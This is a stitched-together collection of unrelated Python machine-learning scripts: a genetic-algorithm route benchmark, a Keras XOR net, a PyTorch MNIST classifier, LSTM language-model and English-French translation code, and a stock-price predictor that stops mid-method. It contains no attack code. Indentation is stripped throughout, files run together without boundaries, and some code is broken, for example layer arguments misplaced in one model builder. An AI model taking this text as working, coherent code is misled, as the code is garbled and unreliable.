def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for i, gens in output:
print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate to higher rate, the curve will be inconsistent and it won't lead us to the optimal distance.
# 1.2 So we need to put it as small as 1% or lower
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuray
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
loss = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
vocab.add(word)
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
file = files[0]
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS), input_shape=input_shape[1:])
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS), return_sequences=True)
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"
X.append(input)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y and preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
X.append(input)
y.append(output)
return X, y
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increased passed index length by 1 to avoid index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, ))[0]), french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of column that contains price predicted, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
self.tensorboard = TensorBoard(log_dir=f"logs\{self.model_name}")
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
